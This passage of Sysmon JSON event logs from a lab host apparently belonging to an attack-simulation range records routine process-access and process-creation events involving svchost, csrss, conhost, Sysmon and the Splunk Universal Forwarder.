C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6034,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:40.662\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2128-5F25-0000-0010585A0900}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:40.662","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2128-5F25-0000-0010585A0900}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6035,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.381\r\nProcessGuid: {41C8662E-2129-5F25-0000-0010245C0900}\r\nProcessId: 1632\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.381","ProcessGuid":"{41C8662E-2129-5F25-0000-0010245C0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6036,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010245C0900}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010245C0900}","TargetProcessId":"1632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6037,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2129-5F25-0000-0010245C0900}\r\nTargetProcessId: 1632\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2129-5F25-0000-0010245C0900}","TargetProcessId":"1632","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6038,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6039,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6040,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6041,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:41.380\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:41.380","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
